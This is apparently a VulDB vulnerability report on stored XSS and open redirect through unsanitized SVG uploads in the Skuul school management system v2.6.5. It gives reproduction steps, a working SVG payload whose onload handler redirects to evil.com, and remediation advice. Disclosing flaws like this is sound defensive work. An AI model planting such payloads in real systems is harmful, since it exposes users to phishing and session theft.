Submit #689012: yungifez Skuul v2.6.5 Open Redirect

Title: yungifez Skuul v2.6.5 Open Redirect

Description: Skuul version 2.6.5 allows the upload of unsanitized SVG files in the Edit School section. Since the application serves uploaded SVGs directly without sanitization or content-type enforcement, attackers can embed JavaScript or redirection payloads inside SVGs. When a user or administrator opens the uploaded image in a new tab, the browser executes the embedded script, resulting in a stored cross-site scripting (XSS) or open redirect attack.

Steps to Reproduce:
1. Log in to Skuul at http://127.0.0.1:8000/login as Admin.
2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit
3. Upload an SVG file with the following content:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>

4. Any user (Super Admin, Student, Teacher or Parent) opens the image in a new tab.
5. The browser automatically redirects to https://evil.com/.

Impact:
-) Automatic redirection to attacker-controlled websites (phishing/malware risk).
-) Stored XSS possibility through malicious SVG payloads.
-) User credential theft or session hijacking if same-origin.
-) High impact if an admin account is compromised, affecting all users.
-) Loss of user trust and potential reputational damage to the platform.

Recommendation:
-) Disallow SVG uploads entirely, or
-) Sanitize SVGs using libraries like DOMPurify, sanitize-svg, or similar before storage.
-) Serve SVGs with the Content-Type: image/svg+xml header and force download where possible.
-) Store and serve only rasterized versions (e.g., PNG/JPEG).

Affected Version: Skuul v2.6.5

Product Source:
-) Website: https://yungifez.github.io/skuul.org/
-) GitHub Repository: https://github.com/yungifez/skuul

Credits: Zeeshan Khan https://www.thezeeshankhan.site/
Source: https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
User: Zeeshan Khan (UID 91384)
Submission: 11/04/2025 17:57 (8 months ago)
Moderation: 11/29/2025 13:59 (25 days later)
Status: Accepted
VulDB entry: 333788 [yungifez Skuul School Management System up to 2.6.5 SVG File edit cross site scripting]
Points: 20
